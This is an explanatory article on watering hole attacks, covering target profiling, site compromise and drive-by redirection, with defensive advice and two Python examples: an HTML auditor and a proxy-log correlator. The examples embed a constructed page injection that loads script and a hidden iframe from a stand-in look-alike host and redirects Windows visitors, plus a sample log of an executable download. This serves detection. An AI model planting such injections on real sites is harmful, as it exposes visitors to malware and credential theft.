A WATERING HOLE ATTACK is a targeted attack in which the perpetrator compromises a website that the intended victims are known to frequent, rather than attacking the victims directly. The name comes from predation in nature: instead of chasing prey, the predator waits at a watering hole that the prey must eventually visit. The attacker likewise plants malicious code on a trusted site and waits. If the first site they poison does not yield the intended victims, they move on to another site the targets use until an encounter occurs.
How a Watering Hole Attack is Implemented
Real watering hole attacks vary in their details, but the basic steps of each are as follows:
The first step is profiling. The perpetrator studies the target organization, the ‘larger’ site, to learn which smaller websites its people visit routinely: partner portals, suppliers, industry forums. This is easy in most cases, since companies tend to list their strategic partners in the ‘About’ section of their websites, and the attacker can register an account on those sites to gather more. Profiling is a critical step in the watering hole process because it tells the attacker which third-party site, once compromised, will put malicious code in front of the victims.
In the second step the perpetrator becomes an attacker. They scan the chosen smaller website, which is usually far less well defended than the target itself, for vulnerabilities in its code or platform (an unpatched content management system or a form that allows script injection, for example) and use one of them to plant malicious code on pages the victims will load. The more vulnerabilities that are discovered, the better: each one is another way in, and another way to regain access after one is fixed.
Now the ball is in the victim’s court. Eventually they make their routine visit to the smaller website, which now carries the attacker’s code. That code runs quietly and quickly in the browser, either for every visitor or only for visitors matching the targeted profile, and redirects the user to a site which hosts additional malware and exploits an unpatched browser or plugin. The outcome is a drive-by installation of Trojans and keyloggers. Endpoint security on the victim’s machine may detect and block the payload, but it does not patch the vulnerability the exploit relies on; that takes keeping the browser and its plugins up to date. The ultimate goal is the collection of usernames, passwords and other sensitive data.
How to Protect Yourself
Endpoint security from reliable anti-malware and antivirus (AV) programs, kept up to date, is the first line of defense, together with prompt patching of browsers and browser plugins, since the injected code usually relies on an unpatched client-side vulnerability. Hashing and encryption protect data at rest and in transit but do nothing to stop a drive-by download, so they should not be counted on here. You should also make use of firewalls and web proxies and ensure they are properly configured and updated, so that known malicious domains and unexpected executable downloads are blocked.
For organizations with full-time staff, regular spot checks of the websites employees visit are strongly advised: compare each page against a known-good copy and look for scripts, iframes or redirects that were not there before. This includes internal websites and even intranet sites, as these too are common targets. If any are identified as infected, immediately block all incoming and outgoing traffic to them.
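As an added example (not code from the original article), here is the kind of check the inspection step above calls for, applied to the injection described in the attack walkthrough: a Python audit of a page’s HTML that flags script tags loading from hosts outside an assumed known-good baseline, zero-size or hidden iframes, meta-refresh redirects and inline scripts that change the visitor’s location. The hostnames, the KNOWN_SCRIPT_HOSTS baseline and both sample pages are constructed for the example.

```python
"""Audit a page employees visit for content a watering hole attacker would inject.

Added example, not code from the original article. Hostnames, the baseline of
known script hosts and both sample pages are constructed for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed baseline: hosts this site legitimately loads scripts from, recorded
# from a known-good copy of the page.
KNOWN_SCRIPT_HOSTS = {"partner-portal.example", "cdn.partner-portal.example"}

# Inline-script constructs that send the visitor somewhere else.
REDIRECT_PATTERNS = [
    re.compile(r"(window\.|top\.|document\.)?location(\.href)?\s*=(?!=)"),
    re.compile(r"location\.(replace|assign)\s*\("),
    re.compile(r"document\.write\s*\("),
]


class PageAuditor(HTMLParser):
    """Collects findings for unknown script hosts, hidden iframes and redirects."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self._in_script = True
            src = attrs.get("src")
            if src:
                host = urlparse(src).hostname or ""  # "" for relative paths
                if host and host not in KNOWN_SCRIPT_HOSTS:
                    self.findings.append(f"external script from unknown host: {host}")
        elif tag == "iframe":
            style = (attrs.get("style") or "").replace(" ", "").lower()
            hidden = (attrs.get("width") == "0" or attrs.get("height") == "0"
                      or "display:none" in style or "visibility:hidden" in style)
            if hidden:
                self.findings.append(f"hidden iframe pointing at {attrs.get('src')}")
        elif tag == "meta" and (attrs.get("http-equiv") or "").lower() == "refresh":
            self.findings.append(f"meta refresh redirect: {attrs.get('content')}")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and any(p.search(data) for p in REDIRECT_PATTERNS):
            self.findings.append(f"inline script changes location: {data.strip()[:70]}")


def audit_page(html):
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    auditor = PageAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed known-good page.
CLEAN_PAGE = """<html><head><title>Partner portal</title>
<script src="https://cdn.partner-portal.example/app.js"></script></head>
<body><h1>Welcome</h1><script>var page = "home";</script></body></html>"""

# The same page after a constructed watering hole injection: a script from a
# look-alike CDN, a zero-size iframe and a redirect that fires only for the
# targeted visitor profile (here, Windows browsers).
INJECTED_PAGE = CLEAN_PAGE.replace("</body>", """<script src="//static-cdn-update.example/jq.js"></script>
<iframe src="http://static-cdn-update.example/lp.php" width="0" height="0"></iframe>
<script>if (navigator.userAgent.indexOf("Windows") !== -1) {
  window.location = "http://static-cdn-update.example/lp.php"; }</script></body>""")

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, audit_page(page))
```

The clean page yields no findings; the injected copy yields three, one per technique. In practice the baseline should be recorded from a copy of the page fetched when it was known to be clean, and the check re-run on a schedule, since an attacker who controls the site can change the injection between visits.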
Finally, educate employees with access to key information about such attacks while promoting sound acceptable-use policies. Coupled with network monitoring tools that watch for suspicious redirects and file transfers, in particular executable downloads from domains the organization has never seen before, your group or organization will be in the best position to counter a watering hole attack.
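Network-monitoring logic of the sort just described, as an added example rather than anything from the original article: it correlates constructed web-proxy log lines to find a client that moves from a routinely visited site to a host outside the organization’s baseline and then pulls an executable from that host within seconds. The log format, the hostnames and the TRUSTED_HOSTS baseline are assumptions made for the example.

```python
"""Correlate web-proxy log lines to spot a watering hole chain.

Added example, not code from the original article. The log format, hostnames
and the TRUSTED_HOSTS baseline are assumptions made for the example.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Assumed baseline of hosts staff routinely visit, built from earlier logs.
TRUSTED_HOSTS = {"partner-portal.example", "cdn.partner-portal.example", "intranet.corp.example"}
# Content types that indicate an executable download.
EXEC_TYPES = {"application/x-msdownload", "application/x-dosexec", "application/octet-stream"}
# A watering hole redirect and the payload fetch happen within seconds of each other.
WINDOW = timedelta(seconds=10)

# Constructed sample. Fields: timestamp client_ip status content_type url referer
SAMPLE_LOG = """\
2024-03-04T09:12:01 10.1.2.15 200 text/html https://partner-portal.example/news -
2024-03-04T09:12:02 10.1.2.15 200 application/javascript https://cdn.partner-portal.example/app.js https://partner-portal.example/news
2024-03-04T09:12:03 10.1.2.15 200 text/html http://static-cdn-update.example/lp.php https://partner-portal.example/news
2024-03-04T09:12:04 10.1.2.15 200 application/x-msdownload http://static-cdn-update.example/flash_update.exe http://static-cdn-update.example/lp.php
2024-03-04T09:30:10 10.1.2.40 200 text/html https://intranet.corp.example/home -
2024-03-04T09:30:12 10.1.2.40 200 text/html https://partner-portal.example/news https://intranet.corp.example/home
"""


def parse_line(line):
    ts, client, status, ctype, url, referer = line.split()
    return {
        "ts": datetime.fromisoformat(ts),
        "client": client,
        "status": int(status),
        "ctype": ctype,
        "host": urlparse(url).hostname,
        "url": url,
        "referer_host": urlparse(referer).hostname if referer != "-" else None,
    }


def find_watering_hole_chains(log_text):
    """Return one alert per client that hops from a trusted site to an unknown
    host and fetches executable content from that host within WINDOW."""
    by_client = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            event = parse_line(line)
            by_client[event["client"]].append(event)

    alerts = []
    for client, events in by_client.items():
        events.sort(key=lambda e: e["ts"])
        for i, hop in enumerate(events):
            # Step 1: a request to a host outside the baseline, referred by a trusted site.
            if hop["host"] in TRUSTED_HOSTS or hop["referer_host"] not in TRUSTED_HOSTS:
                continue
            # Step 2: shortly afterwards the same client pulls an executable from that host.
            for later in events[i + 1:]:
                if later["ts"] - hop["ts"] > WINDOW:
                    break
                if later["host"] == hop["host"] and later["ctype"] in EXEC_TYPES:
                    alerts.append({
                        "client": client,
                        "watering_hole": hop["referer_host"],
                        "landing_host": hop["host"],
                        "payload": later["url"],
                    })
                    break
    return alerts


if __name__ == "__main__":
    for alert in find_watering_hole_chains(SAMPLE_LOG):
        print(alert)
```

On the sample, the client at 10.1.2.15 triggers one alert naming the watering hole (partner-portal.example), the landing host and the downloaded payload; the second client, who only moves between trusted sites, does not. The alert is what should drive the blocking step above: the landing host goes on the block list and the referring site is pulled for inspection.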